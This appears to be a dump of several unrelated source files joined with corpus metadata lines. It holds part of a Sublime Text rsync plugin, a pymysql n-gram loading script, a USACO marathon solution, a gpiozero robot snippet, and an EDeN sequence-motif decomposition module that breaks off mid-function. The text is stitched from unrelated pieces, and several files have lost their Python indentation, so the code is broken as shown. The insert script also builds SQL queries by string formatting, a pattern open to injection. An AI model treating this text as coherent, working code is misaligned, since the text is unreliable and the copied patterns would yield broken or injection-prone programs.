return False
more = parts[0].split("@")
host = ""
if len(more) > 2:
sublime_api.error_message("Unable to parse the remote path you" +
" entered")
return False
elif len(more) == 2:
host = more[1]
else:
host = more[0]
if host == "vagrant":
vms = ["Select VM below...", "---"]
vagrant_api.get_vm_list(vms)
if len(vms) == 2:
sublime_api.error_message("No vagrant VMs found")
return False
if len(vms) == 3:
done_with_vm(userInput, vms, 2)
else:
sublime_api.show_quick_panel(vms,
lambda i=-1:
done_with_vm(userInput, vms, i))
else:
do_it(userInput, "")
return True
def done_with_vm(remotePath, vms, userSelection):
if userSelection == -1:
return False
vm = vagrant_api.parse_vm_id(vms[userSelection])
if vm is None:
return False
print("VM selected", vm)
sshOptions = vagrant_api.get_ssh_options(vm)
print("ssh options", sshOptions)
if sshOptions != "":
do_it(remotePath, sshOptions)
def do_it(remotePath, sshOptions):
settings = {"remotePath": remotePath, "remoteOptions": sshOptions}
sublime_api.update_project_settings(w, path, settings)
if callback is not None:
callback(settings)
remotePath = ""
found = sublime_api.project_by_path(w, path)
if found is not None and found["remotePath"] != "":
remotePath = found["remotePath"]
sublime_api.show_input_panel("Sync this folder to remote folder:",
remotePath, done_with_folder, None, None)
# =============================================================================
class FromRemote(sublime_plugin.TextCommand):
"""Sync a local directory from a remote directory."""
def run(self, edit, paths):
sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0)
def from_remote_async(path):
print("From local path", path)
w = sublime.active_window()
found = sublime_api.project_by_path(w, path)
if found is None or found["remotePath"] == "":
add_remote_async(path, lambda o: sync_api.rsync_remote(
o.get("remotePath", ""), path,
o.get("remoteOptions", ""),
o.get("rsyncOptions", "")))
return True
return sync_api.rsync_remote(found.get("remotePath", ""),
found.get("path", ""),
found.get("remoteOptions", ""),
found.get("rsyncOptions", ""))
# =============================================================================
class ToRemote(sublime_plugin.TextCommand):
"""Sync a local directory to a remote directory."""
def run(self, edit, paths):
sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0)
def to_remote_async(path):
print("To local path", path)
w = sublime.active_window()
found = sublime_api.project_by_path(w, path)
if found is None or found["remotePath"] == "":
add_remote_async(path, lambda o: sync_api.rsync_remote(path,
o.get("remotePath", ""),
o.get("remoteOptions", ""),
o.get("rsyncOptions", "")))
return True
return sync_api.rsync_remote(found.get("path", ""),
found.get("remotePath", ""),
found.get("remoteOptions", ""),
found.get("rsyncOptions", ""))
# =============================================================================
class RemoteEdit(sublime_plugin.EventListener):
"""Sync a local change out."""
def on_post_save_async(self, view):
filename = view.file_name()
w = sublime.active_window()
found = sublime_api.project_by_path(w, filename)
if found is None:
return False
return sync_api.rsync_remote_file(found.get("path", ""), filename,
found.get("remotePath", ""),
found.get("remoteOptions", ""),
found.get("rsyncOptions", ""))
| 1.828125 | 2 |
insert_data.py | FourierYe/calculatepossibility | 0 | 12794288 | <filename>insert_data.py
import main
import traceback
import pymysql
if __name__ == "__main__":
# # ngram_1
# try:
# db = pymysql.connect(host='127.0.0.1',
# port=3306,
# user='root',
# password='<PASSWORD>',
# db='n_grams',
# charset='utf8')
# cursor = db.cursor()
# ngram_stop = 622009+5
# count = 0
# with open(
# '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered'
# ) as file:
# for line in file:
# count = count + 1
# if count > (622009+5):
# break
# if count >=6 and count <= (622009+5):
# ngram_2
try:
db = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='<PASSWORD>',
db='n_grams',
charset='utf8')
cursor = db.cursor()
        count = 0
with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file:
for line in file:
count = count +1
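                # Only the 2-gram section of the input file is processed; each line is "<possibility>\t<word1> <word2>"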
if count >=622017 and count <= 213054597:
content = line.split('\t')
possibility = content[0]
words = content[1]
content = words.split(' ')
under_word = content[0]
after_word = content[1]
punishment = '-99'
sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES ("%s","%s","%s","%s");'%(under_word, after_word, possibility, punishment)
cursor.execute(sql)
except Exception as ex:
db.rollback()
traceback.print_exc()
finally:
db.commit()
cursor.close()
db.close() | 2.625 | 3 |
2014-2015/1-dec2014/p1/Marathon.py | esqu1/USACO | 0 | 12794289 | ##########
# USACO CONTEST 1 PROBLEM 1
# SOLUTION BY <NAME>
# PYTHON 2.7.6
##########
import sys
# Reads in the file marathon.in.
def readin():
f = open("marathon.in",'r')
s = f.read().split("\n")
f.close()
return s
# Computes the total Manhattan distance along the list of checkpoints.
def checkSum(L):
sum = 0
i = 0
while i < len(L) - 1:
sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1])
i+= 1
return sum
#Main function
def main():
l = readin()
checkpoints = []
i = 1
while i <= int(l[0]): #makes checkpoints into a 2D list
temp = l[i].split()
temp = [int(el) for el in temp]
checkpoints.append(temp)
i+= 1
i = 1
total = checkSum(checkpoints)
min = total
while i < int(l[0]) - 1:
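        # Try skipping intermediate checkpoint i; the first and last checkpoints can never be skipped.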
total1 = total
total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1]))
total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1]))
# The way this works: take the original total, and subtract the distances to and from a certain checkpoint. Then add the distance between the checkpoints before and after. This will take care of the missing checkpoint Bessie skips.
if total1 < min:
min = total1
i+= 1
g = open("marathon.out",'w')
g.write(str(min) + "\n")
g.close()
main()
| 3.765625 | 4 |
docs/examples/robot_motion_1.py | codecademy-engineering/gpiozero | 743 | 12794290 | from gpiozero import Robot, Motor, MotionSensor
from signal import pause
robot = Robot(left=Motor(4, 14), right=Motor(17, 18))
pir = MotionSensor(5)
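# Drive forward while motion is detected and stop once it ends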
pir.when_motion = robot.forward
pir.when_no_motion = robot.stop
pause()
| 2.703125 | 3 |
eden/sequence_motif_decomposer.py | zaidurrehman/EDeN | 0 | 12794291 | #!/usr/bin/env python
"""SequenceMotifDecomposer is a motif finder algorithm.
@author: <NAME>
@email: <EMAIL>
"""
import logging
import multiprocessing as mp
import os
from collections import defaultdict
from eden import apply_async
import numpy as np
from scipy.sparse import vstack
from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence
from itertools import izip
import time
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.linear_model import SGDClassifier
from sklearn.cluster import MiniBatchKMeans
from eden.sequence import Vectorizer
from StringIO import StringIO
from Bio import SeqIO
from Bio.Align.Applications import MuscleCommandline
from Bio.Alphabet import IUPAC
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from corebio.seq import Alphabet, SeqList
import weblogolib as wbl
from scipy.cluster.hierarchy import linkage
import regex as re
from collections import Counter
from sklearn import metrics
from eden.util.NeedlemanWunsh import edit_distance
import random
import pylab as plt
import joblib
from scipy.optimize import curve_fit
import multiprocessing
logger = logging.getLogger(__name__)
def sigmoid(x, a, b):
"""sigmoid."""
return 1 / (1 + np.exp(-(x - a) / b))
class PValueEvaluator(object):
"""Fit a parametrized sigmoid on the empirical cumulative distribution."""
def __init__(self, random_state=1):
"""Constructor."""
self.random_state = random_state
self.a = -4
self.b = 1
def ecdf(self, x):
"""Empirical cumulative distribution function."""
xs = np.sort(x)
ys = np.arange(1, len(xs) + 1) / float(len(xs))
return xs, ys
def fit(self, scores):
"""fit."""
if scores:
xs, ys = self.ecdf(scores)
popt, pcov = curve_fit(sigmoid, xs, ys)
self.a, self.b = popt
else:
logger.debug('Warning: reverting to default values')
logger.debug('ECDF fit on %d values' % (len(scores)))
logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b))
def predict(self, value):
"""pvalue."""
y = sigmoid(value, self.a, self.b)
p_val = 1 - y
return p_val
def ecdf(x):
"""Empirical cumulative distribution function."""
xs = np.sort(x)
ys = np.arange(1, len(xs) + 1) / float(len(xs))
return xs, ys
def letter_regex(k, size, regex_th=0.3):
"""letter_regex."""
code = []
for letter, count in k:
if count / float(size) > regex_th:
if letter != '-':
code.append(letter)
if len(code) == 0:
code_str = None
elif len(code) == 1:
code_str = code[0]
else:
code_str = '(' + '|'.join(code) + ')'
return code_str
def consensus_regex(trimmed_align_seqs, regex_th):
"""consensus_regex."""
cluster = []
for h, align_seq in trimmed_align_seqs:
str_list = [c for c in align_seq]
concat_str = np.array(str_list, dtype=np.dtype('a'))
cluster.append(concat_str)
cluster = np.vstack(cluster)
size = len(trimmed_align_seqs)
    code = ''
for i, row in enumerate(cluster.T):
c = Counter(row)
k = c.most_common()
l = letter_regex(k, size, regex_th=regex_th)
if l:
code += l
return code
def find_occurrences(needle, haystack):
"""find_occurrences."""
for h, s in haystack:
matches = re.findall(needle, s, overlapped=True)
if len(matches):
yield 1
else:
yield 0
def occurrences(needle, haystack):
"""occurrences."""
counts = sum(find_occurrences(needle, haystack))
size = len(haystack)
return counts, float(counts) / size
def extract_consensus(seqs, motives, regex_th):
"""extract_consensus."""
for id in motives:
c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th)
counts, freq = occurrences(c_regex, seqs)
yield freq, id, c_regex, counts, motives[id]['consensus_seq']
def plot_location(needle, haystack,
cluster_id=None, nbins=20, size=(17, 2), fname=None):
"""plot_location."""
locs = []
for h, s in haystack:
for match in re.finditer(needle, s):
s = match.start()
e = match.end()
m = s + (e - s) / 2
locs.append(m)
plt.figure(figsize=size)
n, bins, patches = plt.hist(
locs, nbins, normed=0, facecolor='blue', alpha=0.3)
plt.grid()
plt.title(needle)
plt.xlabel('Position')
plt.ylabel('Num occurrences')
if fname:
plt.draw()
figname = '%s_loc_%d.png' % (fname, cluster_id)
plt.savefig(
figname, bbox_inches='tight', transparent=True, pad_inches=0)
else:
figname = None
plt.show()
plt.close()
return figname
def extract_location(needle, haystack):
"""extract_location."""
locs = []
for h, s in haystack:
for match in re.finditer(needle, s):
s = match.start()
e = match.end()
m = s + (e - s) / 2
locs.append(m)
if locs:
avg_loc = np.percentile(locs, 50)
std_loc = np.percentile(locs, 70) - np.percentile(locs, 30)
else:
avg_loc = -1
std_loc = 0
return avg_loc, std_loc
def hits(motives, ids=None):
"""hits."""
for i in ids:
for h, s in motives[i]['seqs']:
tokens = h.split('<loc>')
seq_id = tokens[0]
begin, end = tokens[1].split(':')
yield (seq_id, int(begin), int(end), i)
def compute_cooccurence(motives, ids=None):
"""compute_cooccurence."""
if ids is None:
ids = [id for id in motives]
seqs_summary = defaultdict(list)
for seq_id, begin, end, i in hits(motives, ids=ids):
seqs_summary[seq_id].append((begin, end, i))
distances = defaultdict(list)
size = max(id for id in motives) + 1
cooccurence_mtx = np.zeros((size, size))
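    # cooccurence_mtx[i, j] counts sequences that contain at least one hit of motif i and one of motif j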
for seq_id in sorted(seqs_summary):
cluster_ids = [cluster_id
for begin, end, cluster_id in seqs_summary[seq_id]]
centers = defaultdict(list)
for begin, end, cluster_id in seqs_summary[seq_id]:
centers[cluster_id].append(begin + (end - begin) / 2)
cluster_ids = set(cluster_ids)
for i in cluster_ids:
for j in cluster_ids:
cooccurence_mtx[i, j] += 1
if i != j:
# find closest instance j from any instance in i
d_ij = []
for c_i in centers[i]:
for c_j in centers[j]:
d_ij.append(abs(c_i - c_j))
selected_abs = min(d_ij)
for c_i in centers[i]:
for c_j in centers[j]:
if selected_abs == abs(c_i - c_j):
selected = c_i - c_j
distances[(i, j)].append(selected)
cooccurence_mtx = np.nan_to_num(cooccurence_mtx)
orig_cooccurence_mtx = cooccurence_mtx.copy()
cooccurence_list = []
for i, row in enumerate(cooccurence_mtx):
norm = row[i]
if norm != 0:
row /= norm
else:
row = np.zeros(row.shape)
row[i] = 0
cooccurence_list.append(row)
norm_cooccurence_mtx = np.vstack(cooccurence_list)
return orig_cooccurence_mtx, norm_cooccurence_mtx, distances
def plot_distance(cluster_id_i,
cluster_id_j,
regex_i,
regex_j,
distances,
nbins=5,
size=(6, 2),
fname=None):
"""plot_distance."""
ds = distances[(cluster_id_i, cluster_id_j)]
plt.figure(figsize=size)
n, bins, patches = plt.hist(
ds, nbins, normed=0, facecolor='green', alpha=0.3)
plt.grid()
plt.title('%s vs %s' % (regex_i, regex_j))
plt.xlabel('Relative position')
plt.ylabel('Num occurrences')
if fname:
plt.draw()
figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j)
plt.savefig(
figname, bbox_inches='tight', transparent=True, pad_inches=0)
else:
figname = None
plt.show()
plt.close()
return figname
def mean_shift_decomposition(sig, half_windw_size=5):
"""mean_shift_decomposition."""
sig_len = len(sig)
for i in range(half_windw_size, sig_len - half_windw_size):
min_sig = np.min(sig[i - half_windw_size:i + half_windw_size])
if min_sig == sig[i]:
yield i
def box_decomposition(sig, half_windw_size=5):
"""box_decomposition."""
ids = list(mean_shift_decomposition(sig, half_windw_size))
for i in range(len(ids) - 1):
start = ids[i]
end = ids[i + 1]
width = end - start
val = sum(sig[start:end])
yield val, start, end, width
def cumulative_score(seqs, smod):
"""cumulative_score."""
median_len = np.median([len(s) for h, s in seqs])
sigs = None
for scores in smod.score(seqs):
sig = np.array(scores)
if len(sig) != median_len:
logger.debug('Length mismatch: %d != %d' % (len(sig), median_len))
if sigs is None:
if len(sig) >= median_len:
sigs = sig[:median_len]
else:
if len(sig) >= median_len:
sigs = sigs + sig[:median_len]
sig = np.array(sigs) / float(len(seqs))
return sig
def trim_seqs(seqs, smod, half_windw_size=7):
"""trim_seqs."""
sig = cumulative_score(seqs, smod)
val, start, end, width = max(box_decomposition(sig, half_windw_size))
logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width))
for h, s in seqs:
if s[start:end]:
yield (h, s[start:end])
def plot_cumulative_score(smod,
seqs,
size=(6, 2),
fname=None):
"""plot_cumulative_score."""
sig = cumulative_score(seqs, smod)
plt.figure(figsize=size)
sigp = np.copy(sig)
sigp[sigp < 0] = 0
plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g')
sign = np.copy(sig)
sign[sign >= 0] = 0
plt.bar(range(len(sign)), sign, alpha=0.3, color='r')
plt.grid()
plt.xlabel('Position')
plt.ylabel('Importance score')
if fname:
plt.draw()
figname = '%s_importance.png' % (fname)
plt.savefig(
figname, bbox_inches='tight', transparent=True, pad_inches=0)
else:
figname = None
plt.show()
plt.close()
return figname
# ------------------------------------------------------------------------------
def serial_pre_process(iterable, vectorizer=None):
"""serial_pre_process."""
data_matrix = vectorizer.transform(iterable)
return data_matrix
def chunks(iterable, n):
"""chunks."""
iterable = iter(iterable)
while True:
items = []
for i in range(n):
it = iterable.next()
items.append(it)
yield items
def multiprocess_vectorize(iterable,
vectorizer=None,
pos_block_size=100,
n_jobs=-1):
"""multiprocess_vectorize."""
start_time = time.time()
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(iterable, pos_block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Vectorizing')
start_time = time.time()
matrices = []
for i, p in enumerate(results):
loc_start_time = time.time()
pos_data_matrix = p.get()
matrices += pos_data_matrix
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
size = pos_data_matrix.shape
logger.debug('%d %s (%.2f secs) (delta: %.2f)' %
(i, size, d_time, d_loc_time))
pool.close()
pool.join()
data_matrix = vstack(matrices)
return data_matrix
def multiprocess_fit(pos_iterable, neg_iterable,
vectorizer=None,
estimator=None,
pos_block_size=100,
neg_block_size=100,
n_jobs=-1):
"""multiprocess_fit."""
start_time = time.time()
classes = np.array([1, -1])
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
pos_results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(pos_iterable, pos_block_size)]
neg_results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(neg_iterable, neg_block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Fitting')
start_time = time.time()
for i, (p, n) in enumerate(izip(pos_results, neg_results)):
loc_start_time = time.time()
pos_data_matrix = p.get()
y = [1] * pos_data_matrix.shape[0]
neg_data_matrix = n.get()
y += [-1] * neg_data_matrix.shape[0]
y = np.array(y)
data_matrix = vstack([pos_data_matrix, neg_data_matrix])
estimator.partial_fit(data_matrix, y, classes=classes)
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
size = pos_data_matrix.shape
logger.debug('%d %s (%.2f secs) (delta: %.2f)' %
(i, size, d_time, d_loc_time))
pool.close()
pool.join()
return estimator
def multiprocess_performance(pos_iterable, neg_iterable,
vectorizer=None,
estimator=None,
pos_block_size=100,
neg_block_size=100,
n_jobs=-1):
"""multiprocess_performance."""
start_time = time.time()
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
pos_results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(pos_iterable, pos_block_size)]
neg_results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(neg_iterable, neg_block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Performance evaluation')
start_time = time.time()
preds = []
binary_preds = []
true_targets = []
for i, (p, n) in enumerate(izip(pos_results, neg_results)):
loc_start_time = time.time()
pos_data_matrix = p.get()
y = [1] * pos_data_matrix.shape[0]
neg_data_matrix = n.get()
y += [-1] * neg_data_matrix.shape[0]
y = np.array(y)
true_targets.append(y)
data_matrix = vstack([pos_data_matrix, neg_data_matrix])
pred = estimator.decision_function(data_matrix)
preds.append(pred)
binary_pred = estimator.predict(data_matrix)
binary_preds.append(binary_pred)
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
size = pos_data_matrix.shape
logger.debug('%d %s (%.2f secs) (delta: %.2f)' %
(i, size, d_time, d_loc_time))
pool.close()
pool.join()
preds = np.hstack(preds)
binary_preds = np.hstack(binary_preds)
true_targets = np.hstack(true_targets)
return preds, binary_preds, true_targets
def serial_subarray(iterable,
vectorizer=None,
estimator=None,
min_subarray_size=5,
max_subarray_size=10):
"""serial_subarray."""
annotated_seqs = vectorizer.annotate(iterable, estimator=estimator)
subarrays_items = []
for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs):
subarrays = compute_max_subarrays_sequence(
seq=seq, score=score,
min_subarray_size=min_subarray_size,
max_subarray_size=max_subarray_size,
margin=1,
output='all')
subseqs = []
for subarray in subarrays:
subseq_seq = subarray['subarray_string']
begin = subarray['begin']
end = subarray['end']
score = subarray['score']
header = orig_header
header += '<loc>%d:%d<loc>' % (begin, end)
header += '<score>%.4f<score>' % (score)
header += '<subseq>%s<subseq>' % (subseq_seq)
subseq = (header, seq)
subseqs.append(subseq)
subarrays_items += subseqs
return subarrays_items
def multiprocess_subarray(iterable,
vectorizer=None,
estimator=None,
min_subarray_size=5,
max_subarray_size=10,
block_size=100,
n_jobs=-1):
"""multiprocess_subarray."""
start_time = time.time()
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
results = [apply_async(
pool, serial_subarray,
args=(seqs,
vectorizer,
estimator,
min_subarray_size,
max_subarray_size))
for seqs in chunks(iterable, block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Annotating')
start_time = time.time()
subarrays_items = []
for i, p in enumerate(results):
loc_start_time = time.time()
subarrays_item = p.get()
subarrays_items += subarrays_item
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
logger.debug('%d (%.2f secs) (delta: %.2f)' %
(i, d_time, d_loc_time))
pool.close()
pool.join()
return subarrays_items
def serial_score(iterable,
vectorizer=None,
estimator=None):
"""serial_score."""
annotated_seqs = vectorizer.annotate(iterable, estimator=estimator)
scores = [score for seq, score in annotated_seqs]
return scores
def multiprocess_score(iterable,
vectorizer=None,
estimator=None,
block_size=100,
n_jobs=-1):
"""multiprocess_score."""
start_time = time.time()
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
results = [apply_async(
pool, serial_score,
args=(seqs,
vectorizer,
estimator))
for seqs in chunks(iterable, block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Predicting')
start_time = time.time()
scores_items = []
for i, p in enumerate(results):
loc_start_time = time.time()
scores = p.get()
scores_items += scores
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
logger.debug('%d (%.2f secs) (delta: %.2f)' %
(i, d_time, d_loc_time))
pool.close()
pool.join()
return scores_items
# ------------------------------------------------------------------------------
def _fasta_to_fasta(lines):
seq = ""
for line in lines:
if line:
if line[0] == '>':
if seq:
yield seq
seq = ""
line_str = str(line)
yield line_str.strip()
else:
line_str = line.split()
if line_str:
seq += str(line_str[0]).strip()
if seq:
yield seq
# ------------------------------------------------------------------------------
class MuscleAlignWrapper(object):
"""A wrapper to perform Muscle Alignment on sequences."""
def __init__(self,
diags=False,
maxiters=16,
maxhours=None,
# TODO: check if this alphabet is required
# it over-rides tool.alphabet
alphabet='dna', # ['dna', 'rna', 'protein']
):
"""Initialize an instance."""
self.diags = diags
self.maxiters = maxiters
self.maxhours = maxhours
if alphabet == 'protein':
self.alphabet = IUPAC.protein
elif alphabet == 'rna':
self.alphabet = IUPAC.unambiguous_rna
else:
self.alphabet = IUPAC.unambiguous_dna
def _seq_to_stdin_fasta(self, seqs):
        # separating headers
headers, instances = [list(x) for x in zip(*seqs)]
instances_seqrecord = []
for i, j in enumerate(instances):
instances_seqrecord.append(
SeqRecord(Seq(j, self.alphabet), id=str(i)))
handle = StringIO()
SeqIO.write(instances_seqrecord, handle, "fasta")
data = handle.getvalue()
return headers, data
def _perform_ma(self, data):
params = {'maxiters': 7}
if self.diags is True:
params['diags'] = True
if self.maxhours is not None:
params['maxhours'] = self.maxhours
muscle_cline = MuscleCommandline(**params)
stdout, stderr = muscle_cline(stdin=data)
return stdout
def _fasta_to_seqs(self, headers, stdout):
out = list(_fasta_to_fasta(stdout.split('\n')))
motif_seqs = [''] * len(headers)
for i in range(len(out[:-1]))[::2]:
id = int(out[i].split(' ')[0].split('>')[1])
motif_seqs[id] = out[i + 1]
return zip(headers, motif_seqs)
def transform(self, seqs=[]):
"""Carry out alignment."""
headers, data = self._seq_to_stdin_fasta(seqs)
stdout = self._perform_ma(data)
aligned_seqs = self._fasta_to_seqs(headers, stdout)
return aligned_seqs
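# Illustrative usage sketch (added for clarity; not part of the original
# module and never invoked). It assumes the external `muscle` binary is
# installed and on the PATH, as required by MuscleCommandline.
def _example_muscle_align():
    ma = MuscleAlignWrapper(alphabet='rna')
    return ma.transform(seqs=[('seq0', 'ACGUACGU'), ('seq1', 'ACGUACGG')])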
# ------------------------------------------------------------------------------
class Weblogo(object):
"""A wrapper of weblogolib for creating sequence."""
def __init__(self,
output_format='png', # ['eps','png','png_print','jpeg']
stacks_per_line=40,
sequence_type='dna', # ['protein','dna','rna']
ignore_lower_case=False,
# ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability']
units='bits',
first_position=1,
logo_range=list(),
# composition = 'auto',
scale_stack_widths=True,
error_bars=True,
title='',
figure_label='',
show_x_axis=True,
x_label='',
show_y_axis=True,
y_label='',
y_axis_tic_spacing=1.0,
show_ends=False,
# ['auto','base','pairing','charge','chemistry','classic','monochrome']
color_scheme='classic',
resolution=96,
fineprint='',
):
"""Initialize an instance."""
options = wbl.LogoOptions()
options.stacks_per_line = stacks_per_line
options.sequence_type = sequence_type
options.ignore_lower_case = ignore_lower_case
options.unit_name = units
options.first_index = first_position
if logo_range:
options.logo_start = logo_range[0]
options.logo_end = logo_range[1]
options.scale_width = scale_stack_widths
options.show_errorbars = error_bars
if title:
options.title = title
if figure_label:
options.logo_label = figure_label
options.show_xaxis = show_x_axis
if x_label:
options.xaxis_label = x_label
options.show_yaxis = show_y_axis
if y_label:
options.yaxis_label = y_label
options.yaxis_tic_interval = y_axis_tic_spacing
options.show_ends = show_ends
options.color_scheme = wbl.std_color_schemes[color_scheme]
options.resolution = resolution
if fineprint:
options.fineprint = fineprint
self.options = options
self.output_format = output_format
def create_logo(self, seqs=[]):
"""Create sequence logo for input sequences."""
        # separate headers
headers, instances = [list(x)
for x in zip(*seqs)]
        if self.options.sequence_type == 'rna':
            alphabet = Alphabet('ACGU')
        elif self.options.sequence_type == 'protein':
alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY')
else:
alphabet = Alphabet('AGCT')
motif_corebio = SeqList(alist=instances, alphabet=alphabet)
data = wbl.LogoData().from_seqs(motif_corebio)
format = wbl.LogoFormat(data, self.options)
if self.output_format == 'png':
return wbl.png_formatter(data, format)
elif self.output_format == 'png_print':
return wbl.png_print_formatter(data, format)
elif self.output_format == 'jpeg':
return wbl.jpeg_formatter(data, format)
else:
return wbl.eps_formatter(data, format)
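# Illustrative usage sketch (added for clarity; not part of the original
# module and never invoked): render a PNG sequence logo from pre-aligned
# (header, sequence) pairs using the wrapper above.
def _example_weblogo(aligned_seqs):
    wb = Weblogo(output_format='png', sequence_type='rna', units='bits')
    return wb.create_logo(seqs=aligned_seqs)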
# ------------------------------------------------------------------------------
class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin):
"""SequenceMotifDecomposer."""
def __init__(self,
complexity=5,
n_clusters=10,
min_subarray_size=4,
max_subarray_size=10,
estimator=SGDClassifier(warm_start=True),
class_estimator=SGDClassifier(),
clusterer=MiniBatchKMeans(),
pos_block_size=300,
neg_block_size=300,
n_jobs=-1):
"""Construct."""
self.complexity = complexity
self.n_clusters = n_clusters
self.min_subarray_size = min_subarray_size
self.max_subarray_size = max_subarray_size
self.pos_block_size = pos_block_size
self.neg_block_size = neg_block_size
self.n_jobs = n_jobs
self.vectorizer = Vectorizer(complexity=complexity,
auto_weights=True,
nbits=15)
self.estimator = estimator
self.class_estimator = class_estimator
self.clusterer = clusterer
self.clusterer_is_fit = False
def save(self, model_name):
"""save."""
joblib.dump(self, model_name, compress=1)
def load(self, obj):
"""load."""
self.__dict__.update(joblib.load(obj).__dict__)
def fit(self, pos_seqs=None, neg_seqs=None):
"""fit."""
try:
self.estimator = multiprocess_fit(
pos_seqs, neg_seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
pos_block_size=self.pos_block_size,
neg_block_size=self.neg_block_size,
n_jobs=self.n_jobs)
self.fit_decomposition(neg_seqs)
return self
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def performance(self, pos_seqs=None, neg_seqs=None):
"""performance."""
try:
y_pred, y_binary, y_test = multiprocess_performance(
pos_seqs, neg_seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
pos_block_size=self.pos_block_size,
neg_block_size=self.neg_block_size,
n_jobs=self.n_jobs)
# confusion matrix
cm = metrics.confusion_matrix(y_test, y_binary)
np.set_printoptions(precision=2)
logger.info('Confusion matrix:')
logger.info(cm)
# classification
logger.info('Classification:')
logger.info(metrics.classification_report(y_test, y_binary))
# roc
logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred)))
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def _decompose_header(self, header):
score = header.split('<score>')[1]
score = float(score)
loc = header.split('<loc>')[1]
begin, end = loc.split(':')
begin = int(begin)
end = int(end)
subseq = header.split('<subseq>')[1]
orig_header = header.split('<loc>')[0]
return orig_header, score, begin, end, subseq
def decompose(self, seqs=None, p_value=0.05):
"""decomposition_scores."""
try:
subarrays_items = multiprocess_subarray(
seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
min_subarray_size=self.min_subarray_size,
max_subarray_size=self.max_subarray_size,
block_size=self.pos_block_size,
n_jobs=self.n_jobs)
for header, seq in subarrays_items:
components = self._decompose_header(header)
orig_header, score, begin, end, subseq = components
p = self.compute_p_value(score)
if p <= p_value:
yield orig_header, begin, end, p, subseq
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def decomposition_scores(self, seqs=None):
"""decomposition_scores."""
try:
subarrays_items = multiprocess_subarray(
seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
min_subarray_size=self.min_subarray_size,
max_subarray_size=self.max_subarray_size,
block_size=self.pos_block_size,
n_jobs=self.n_jobs)
for header, seq in subarrays_items:
yield self._decompose_header(header)
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def fit_decomposition(self, seqs=None):
"""fit_decomposition."""
self.a, self.b = -4, 1
scores = [score for header, score, begin, end, subseq in
self.decomposition_scores(seqs)]
if scores:
xs, ys = ecdf(scores)
popt, pcov = curve_fit(sigmoid, xs, ys)
self.a, self.b = popt
else:
logger.debug('Warning: reverting to default values')
logger.debug('ECDF fit on %d values' % (len(scores)))
logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b))
def compute_p_value(self, value):
"""p_value."""
y = sigmoid(value, self.a, self.b)
p_val = 1 - y
return p_val
def compute_clusters(self, seqs=None, p_value=0.05):
"""compute_clusters."""
try:
subsequences = []
iterable = self.decompose(seqs, p_value=p_value)
for header, begin, end, p, subseq in iterable:
new_header = header
new_header += '<loc>' + str(begin) + ':'
new_header += str(end) + '<loc>'
subsequences.append((new_header, subseq))
if not subsequences:
raise Exception('No subarray was selected. Increase p_value.')
logger.debug('Working on: %d fragments' % len(subsequences))
n = multiprocessing.cpu_count()
pos_block_size = len(subsequences) / n
data_matrix = multiprocess_vectorize(
subsequences,
vectorizer=self.vectorizer,
pos_block_size=pos_block_size,
n_jobs=self.n_jobs)
